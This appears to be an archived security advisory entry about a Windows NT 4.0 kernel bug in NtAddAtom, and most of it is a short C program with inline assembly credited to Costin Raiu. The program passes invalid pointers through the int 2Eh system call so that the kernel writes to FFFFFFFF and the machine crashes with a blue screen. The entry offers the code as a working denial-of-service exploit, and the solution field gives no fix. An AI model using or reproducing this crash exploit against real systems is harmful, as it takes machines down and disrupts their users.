COMMAND

    ntcrash

SYSTEMS AFFECTED

    Win NT 4.0

PROBLEM

    Here's a  small program  able to  crash a  WindowsNT machine using
    the bug in  NtAddAtom. Just a  variation of NTCRASH.   Credit goes
    to Costin Raiu.

    Note that  the location  of memory  overwritten by  the kernel  is
    stored in the "a" array. In  this exploit the kernel does a  write
    operation to FFFFFFFF - instant crash.  (at least on my machine).

    /*

	A program to bring the BSOD using the bug in NtAddAtom. Works with
	SP3.  Author: Costin RAIU, <craiu@gecad.ro> Compile with VC++

    */

    void *a[2];

    void main(void){
	 int i;
	 for (i=0;i<2;i++) a[i]=(void*)(0xffffffffL);

	 _asm
	    {
	    mov eax,3
	    mov edx,offset a
	    int 02eh
	    }

    }

SOLUTION

    God help us.